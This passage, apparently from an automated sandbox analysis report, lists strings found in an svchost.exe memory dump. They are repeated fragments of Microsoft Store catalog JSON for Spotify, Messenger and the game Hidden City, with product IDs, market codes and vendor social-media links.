boxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-01T08:42:55.8407457Z\|\|.\|\|646da06c-a69a-4aff-bcc8-3f5a349348ca\|\|1152921505693336001\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000F.00000003.450300636.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JEc equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.450300636.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JEc equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000F.00000003.442264061.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-06T17:58:28.3925008Z\|\|.\|\|9f1af5de-a917-4d59-b623-fd59991517bf\|\|1152921505693355901\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-04-06T17:57:25.3126054Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000F.00000003.439276219.00000221A4002000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 